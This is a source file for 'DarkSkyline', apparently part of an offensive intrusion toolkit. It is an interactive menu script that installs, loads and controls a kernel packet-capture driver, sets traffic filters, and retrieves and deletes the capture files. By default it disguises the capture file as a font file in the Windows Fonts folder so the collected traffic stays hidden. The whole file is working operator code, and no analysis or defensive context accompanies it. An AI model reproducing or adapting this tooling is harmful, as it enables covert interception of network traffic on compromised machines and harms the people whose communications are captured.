316 lines
7.8 KiB
PostScript
316 lines
7.8 KiB
PostScript
|
#--------------------------------------------------------
|
||
|
# File: DarkSkyline.eps
|
||
|
#
|
||
|
# Wrapper script for DarkSkyline tools
|
||
|
#
|
||
|
# Modifications:
|
||
|
# 11/26/2002 Created.
|
||
|
# 05/03/2004 Updated to let user change capture file
|
||
|
#--------------------------------------------------------
|
||
|
@include "_RecordToolUse.epm";
|
||
|
|
||
|
@echo off;
|
||
|
|
||
|
# defaults
|
||
|
string $driverName = "tdip";
|
||
|
string $captureFile = "\\SystemRoot\\Fonts\\vga_ds.tff";
|
||
|
string $version = "DarkSkyline 2.2.0.1";
|
||
|
|
||
|
_RecordToolUse("DarkSkyline", $version);
|
||
|
|
||
|
# commands
|
||
|
int $installCmdsStart = 1;
|
||
|
int $normalCmdsStart = 9;
|
||
|
int $controlCmdsStart = 14;
|
||
|
int $captureCmdsStart = 18;
|
||
|
string $commands;
|
||
|
$commands[0] = "Quit";
|
||
|
|
||
|
# start of "install" commands
|
||
|
$commands[1] = "Change driver name";
|
||
|
$commands[2] = "Change capture file";
|
||
|
$commands[3] = "Install tools";
|
||
|
$commands[4] = "Uninstall tools";
|
||
|
$commands[5] = "Load driver";
|
||
|
$commands[6] = "Unload driver";
|
||
|
$commands[7] = "Verify install";
|
||
|
$commands[8] = "Verify driver is running";
|
||
|
|
||
|
# start of "config" commands
|
||
|
$commands[9] = "Get current status";
|
||
|
$commands[10] = "Get packet filter";
|
||
|
$commands[11] = "Set packet filter";
|
||
|
$commands[12] = "Set max capture file size";
|
||
|
$commands[13] = "Set the maximum packet size";
|
||
|
|
||
|
# start of "control" commands
|
||
|
$commands[14] = "Disable scanning";
|
||
|
$commands[15] = "Enable scanning";
|
||
|
$commands[16] = "Stop scanning";
|
||
|
$commands[17] = "Start scanning";
|
||
|
|
||
|
# start of "capture file" commands
|
||
|
$commands[18] = "Retreive packet capture file";
|
||
|
$commands[19] = "Delete packet capture file";
|
||
|
$commands[20] = "Parse capture file";
|
||
|
|
||
|
while (true) {
|
||
|
echo "\r\n\r\n";
|
||
|
echo "$version\r\n";
|
||
|
|
||
|
# Print the current configuration
|
||
|
echo "Current Configuration:";
|
||
|
echo "\t Driver Name : $driverName";
|
||
|
echo "\tCapture File : $captureFile";
|
||
|
echo "";
|
||
|
|
||
|
# print the command list
|
||
|
int $i=0;
|
||
|
while ($i < sizeof($commands)) {
|
||
|
if ($i == $installCmdsStart) {
|
||
|
echo "";
|
||
|
echo "Installation commands:";
|
||
|
} else if ($i == $normalCmdsStart) {
|
||
|
echo "";
|
||
|
echo "Configuration commands";
|
||
|
} else if ($i == $controlCmdsStart) {
|
||
|
echo "";
|
||
|
echo "Control commands:";
|
||
|
} else if ($i == $captureCmdsStart) {
|
||
|
echo "";
|
||
|
echo "Capture File commands:";
|
||
|
}
|
||
|
echo "($i). $commands[$i]";
|
||
|
$i++;
|
||
|
}
|
||
|
|
||
|
echo "";
|
||
|
int $choice = GetInput("Enter the desired option");
|
||
|
if ($choice == 0) {
|
||
|
|
||
|
# quit
|
||
|
return true;
|
||
|
|
||
|
} else if ($choice == 1) {
|
||
|
|
||
|
# Change driver name
|
||
|
echo "Current driver name = '$driverName'";
|
||
|
$driverName = GetInput("Enter new driver name");
|
||
|
|
||
|
} else if ($choice == 2) {
|
||
|
|
||
|
# Change capture file name
|
||
|
GetCaptureFile($captureFile);
|
||
|
|
||
|
} else if ($choice == 3) {
|
||
|
|
||
|
# install driver
|
||
|
if (`script DarkSkyline\\Install.eps $driverName "$captureFile"`) {
|
||
|
echo "INSTALL SUCCESS";
|
||
|
echo "";
|
||
|
echo "NOTE: The driver has not been loaded";
|
||
|
} else {
|
||
|
echo "**** INSTALL FAILED ****";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 4) {
|
||
|
|
||
|
# uinstall driver
|
||
|
if (`script DarkSkyline\\Uninstall.eps $driverName`) {
|
||
|
echo "UNINSTALL SUCCESS";
|
||
|
echo "";
|
||
|
echo "**** NOTE: The capture file must be deleted seperately ****";
|
||
|
} else {
|
||
|
echo "**** UNINSTALL FAILED ****";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 5) {
|
||
|
|
||
|
# load the driver
|
||
|
if (prompt "Load the driver ($driverName)?") {
|
||
|
@echo on;
|
||
|
`driverload -name $driverName`;
|
||
|
@echo off;
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 6) {
|
||
|
|
||
|
# unload the driver
|
||
|
if (prompt "Unload the driver ($driverName)?") {
|
||
|
@echo on;
|
||
|
`driverunload -name $driverName`;
|
||
|
@echo off;
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 7) {
|
||
|
|
||
|
# verify install
|
||
|
if (`script DarkSkyline\\VerifyInstall.eps $driverName`) {
|
||
|
echo "VERIFICATION SUCCESSFULL";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO VERIFY INSTALL ****";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 8) {
|
||
|
|
||
|
# verify install
|
||
|
if (`script DarkSkyline\\VerifyRunning.eps $driverName`) {
|
||
|
echo "VERIFICATION SUCCESSFUL";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO VERIFY DRIVER IS RUNNING ****";
|
||
|
}
|
||
|
|
||
|
### CONFIG COMMANDS ###
|
||
|
|
||
|
} else if ($choice == 9) {
|
||
|
|
||
|
# get the current status
|
||
|
`script DarkSkyline\\GetStatus.eps $driverName "$captureFile"`;
|
||
|
|
||
|
} else if ($choice == 10) {
|
||
|
|
||
|
# get the current filter
|
||
|
@echo on;
|
||
|
`packetscan -name $driverName -get`;
|
||
|
@echo off;
|
||
|
|
||
|
} else if ($choice == 11) {
|
||
|
|
||
|
# set the current filter
|
||
|
if (`script DarkSkyline\\SetFilter.eps $driverName`) {
|
||
|
echo "SET OF FILTER SUCCESSFUL";
|
||
|
echo "";
|
||
|
echo "NOTE: Packet capturing has been STOPPED";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO SET NEW FILTER ****";
|
||
|
echo "";
|
||
|
echo "NOTE: The driver must be started before a filter may be set";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 12) {
|
||
|
|
||
|
# set the maximum capture file size
|
||
|
if (`script DarkSkyline\\SetMaxFileSize.eps $driverName`) {
|
||
|
echo "SET OF MAX CAPTURE FILE SIZE SUCCESSFUL";
|
||
|
echo "";
|
||
|
echo "NOTE: Packet capturing must STOPPED and RESTARTED";
|
||
|
echo " for this change to take effect.";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO SET MAXIMUM CAPTURE FILE SIZE ****";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 13) {
|
||
|
|
||
|
# set the maximum packet size
|
||
|
if (`script DarkSkyline\\SetPacketSize.eps $driverName`) {
|
||
|
echo "SET OF MAX PACKET SIZE SUCCESSFUL";
|
||
|
echo "";
|
||
|
echo "NOTE: Packet capturing must STOPPED and RESTARTED";
|
||
|
echo " for this change to take effect.";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO SET MAXIMUM PACKET SIZE ****";
|
||
|
}
|
||
|
|
||
|
### CONFIG COMMANDS ###
|
||
|
|
||
|
### CONTROL COMMANDS ###
|
||
|
|
||
|
} else if ($choice == 14) {
|
||
|
|
||
|
# disable scanning
|
||
|
@echo on;
|
||
|
`packetscan -name $driverName -control disable`;
|
||
|
@echo off;
|
||
|
|
||
|
} else if ($choice == 15) {
|
||
|
|
||
|
# enable scanning
|
||
|
@echo on;
|
||
|
`packetscan -name $driverName -control enable`;
|
||
|
@echo off;
|
||
|
|
||
|
} else if ($choice == 16) {
|
||
|
|
||
|
# stop scanning
|
||
|
@echo on;
|
||
|
`packetscan -name $driverName -control stop`;
|
||
|
@echo off;
|
||
|
|
||
|
} else if ($choice == 17) {
|
||
|
|
||
|
# start scanning
|
||
|
@echo on;
|
||
|
`packetscan -name $driverName -control start`;
|
||
|
@echo off;
|
||
|
|
||
|
### CONTROL COMMANDS ###
|
||
|
|
||
|
### CAPTURE FILE COMMANDS ###
|
||
|
|
||
|
} else if ($choice == 18) {
|
||
|
|
||
|
# get packet capture file
|
||
|
if (`script DarkSkyline\\HandleCapture.eps $driverName get "$captureFile"`) {
|
||
|
echo "GET OF CAPTURE FILE SUCCESSFUL";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO GET CAPTURE FILE ****";
|
||
|
echo "";
|
||
|
echo "NOTE: Capturing must be stopped before the file";
|
||
|
echo " can be retrieved";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 19) {
|
||
|
|
||
|
# get packet capture file
|
||
|
if (`script DarkSkyline\\HandleCapture.eps $driverName delete "$captureFile"`) {
|
||
|
echo "DELETE OF CAPTURE FILE SUCCESSFUL";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO DELETE CAPTURE FILE ****";
|
||
|
echo "";
|
||
|
echo "NOTE: Capturing must be stopped before the file";
|
||
|
echo " can be deleted";
|
||
|
}
|
||
|
|
||
|
} else if ($choice == 20) {
|
||
|
|
||
|
# parse the capture file
|
||
|
if (`script DarkSkyline\\ParseCapture.eps`) {
|
||
|
echo "PARSE OF CAPTURE FILE SUCCESSFUL";
|
||
|
} else {
|
||
|
echo "**** UNABLE TO PARSE CAPTURE FILE ****";
|
||
|
}
|
||
|
|
||
|
### CAPTURE FILE COMMANDS ###
|
||
|
|
||
|
} else {
|
||
|
# invalid choice
|
||
|
echo "*** Invalid choice ***";
|
||
|
}
|
||
|
|
||
|
pause;
|
||
|
}
|
||
|
|
||
|
return true;
|
||
|
|
||
|
#---------------------------------------------------------------------------
|
||
|
Sub GetCaptureFile(REF string $captureFile)
|
||
|
{
|
||
|
|
||
|
echo "Enter a new capture file in kernel-mode form:";
|
||
|
echo " eg. '\\SystemRoot\\Fonts\\vga_ds.tff' or '\\??\\D:\\temp\\~fg34.tmp'";
|
||
|
while (true) {
|
||
|
# get the path -- making sure that it's at least in a valid form
|
||
|
$captureFile = GetInput("Enter a Capture File");
|
||
|
string $parts = Split("\\", $captureFile);
|
||
|
if ((sizeof($parts) < 3) || ($parts[0] != "") || (($parts[1] != "SystemRoot") && ($parts[1] != "??"))) {
|
||
|
echo "* Invalid capture path";
|
||
|
} else {
|
||
|
# good capture path
|
||
|
break;
|
||
|
}
|
||
|
}
|
||
|
|
||
|
return true;
|
||
|
|
||
|
}
|
||
|
# end GetCaptureFile
|